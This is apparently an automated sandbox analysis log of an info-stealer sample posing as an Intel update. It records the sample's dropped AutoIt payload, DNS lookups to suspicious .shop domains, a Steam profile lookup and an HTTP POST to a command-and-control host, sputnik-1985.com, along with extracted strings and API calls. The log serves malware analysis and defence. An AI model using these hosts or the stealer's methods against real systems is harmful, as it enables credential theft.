                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8D889 InternetReadFile,SetEvent,GetLastError,SetEvent,13_2_00F8D889
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg
                Source: global trafficDNS traffic detected: DNS query: lastlossunbag.click
                Source: global trafficDNS traffic detected: DNS query: nearycrepso.shop
                Source: global trafficDNS traffic detected: DNS query: abruptyopsn.shop
                Source: global trafficDNS traffic detected: DNS query: wholersorie.shop
                Source: global trafficDNS traffic detected: DNS query: framekgirus.shop
                Source: global trafficDNS traffic detected: DNS query: tirepublicerj.shop
                Source: global trafficDNS traffic detected: DNS query: noisycuttej.shop
                Source: global trafficDNS traffic detected: DNS query: rabidcowse.shop
                Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp, [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Hugo.com, 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lastlossunbag.click/api
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/LOX
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Site
                Source: Hugo.com, 0000000D.00000003.2717609537.0000000001B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/a
                Source: Hugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api0
                Source: Hugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apij
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apijhhCf
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apila
                Source: Hugo.com, 0000000D.00000002.2765479156.0000000001A35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/i~
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/r
                Source: Hugo.com, 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/t
                Source: Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/apial
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119972433190
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: [UPD]Intel_Unit.2.1.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: Hugo.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Hugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: Hugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
                Source: unknownNetwork traffic detected: HTTP traffic on port 50742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50738
                Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
                Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
                Source: unknownNetwork traffic detected: HTTP traffic on port 50744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50741
                Source: unknownNetwork traffic detected: HTTP traffic on port 50739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 443
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50744 version: TLS 1.2
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00F8F7C7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00F8F55C
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00FA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00FA9FD2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F2FFE0 CloseHandle,NtProtectVirtualMemory,13_2_00F2FFE0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,13_2_00F84763
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00F71B4D
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00F7F20D
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile created: C:\Windows\FranchiseReedJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile created: C:\Windows\ChristineSnapshotJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile created: C:\Windows\BmAccurateJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_0040497C0_2_0040497C
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00406ED20_2_00406ED2
